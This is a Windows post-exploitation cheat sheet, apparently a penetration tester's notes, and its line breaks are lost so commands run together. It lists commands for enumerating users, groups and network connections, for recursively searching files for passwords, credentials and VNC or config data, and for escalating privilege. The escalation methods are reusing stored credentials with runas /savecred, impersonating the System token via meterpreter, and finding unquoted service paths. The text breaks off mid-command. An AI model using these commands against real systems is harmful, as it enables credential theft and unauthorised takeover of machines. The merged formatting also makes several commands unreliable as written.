net usersnet localgroupsnet localgroups Administratorsnet user hax0r#Check local and domainnet user hax0r /domainnet group Administrators /domain
Network information/connections
ipconfig /allroute printarp -Anetstat -ano
Search tips
#FindStrfindstr /spin "password"*.*//Recursive string scan#Dirdir /a-r-d /s /b //Search for writeable directoriesdir secret.txt/s /p //Search for secret.txt recursive from folderdir /s *pass*==*cred*==*vnc*==*.config*//Search for certain words
Privilege Escalation
Stored Credential
cmdkey /list //Check if any stored keyrunas /user:administrator /savecred "cmd.exe /k whoami"//Using them
Impersonating Tokens with meterpreter
use incognitolist_tokens -uimpersonate_token NT-AUTHORITY\System
Unquoted Path
#Obtain the path of the executable called by a Windows servicesc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul
#Default searchwmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v